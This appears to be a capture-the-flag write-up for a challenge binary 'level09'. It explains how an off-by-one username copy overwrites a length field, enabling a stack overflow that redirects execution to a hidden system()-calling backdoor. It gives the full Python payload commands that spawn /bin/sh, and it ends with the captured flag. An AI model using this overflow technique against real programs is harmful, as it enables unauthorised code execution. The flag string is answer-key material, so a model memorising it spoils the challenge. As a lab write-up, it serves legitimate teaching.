### Explanations
This program is an interface allowing users to send messages.
To keep track of information, it uses the following __data structure__:
```
struct  s_msg
{
	char    content[140];
	char    user[40];
	int     len;
};
```

In the function _set_username()_, 41 characters are copied in the _user_ array, which can only contain 40. This means that the __41st character__ of our input will be __copied inside of the least significant byte of _len___.

Thus, we have __control over the length argument of the _strncpy()___ in _set_msg()_. If we use a string of 40 characters followed by '\xff' as our username, we can __overflow the content array__.

At this point, 255 bytes will be copied into a 140 characters array. We can start investigating as usual, with a pattern of 255 characters and can check where it segfaults.
Indeed, the __return address for the function _handle_msg()_ has been overriden__ by the characters located at the __offset 200__ of our pattern.
In order to check that, we used the following:
```
$ python -c 'print "A"*40 + "\xff" + "\n" + "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G"' > /tmp/payload
```

In this executable is also present a ___secret_backdoor()_ function__, which reads user input with _fgets()_ and __calls _system()___ with the user-provided argument.
We can get its address with the `info function secret_backdoor` gdb command. If we replace the return address of _handle_msg()_ by 0x000055555555488c, we should be inside of this function.

Our final payload can then be executed as follows: 
```
$ python -c 'print "A"*40 + "\xff" + "\n" + "A"*200 + "\x8c\x48\x55\x55\x55\x55\x00\x00" + "\n" + "/bin/sh"' > /tmp/payload
$ cat /tmp/payload - | ./level09
```

And we can retrieve the flag with the usual command.

### Flag
`j4AunAPDXaJxxWjYEUxpanmvSgRDV3tpA5BEaBuE`
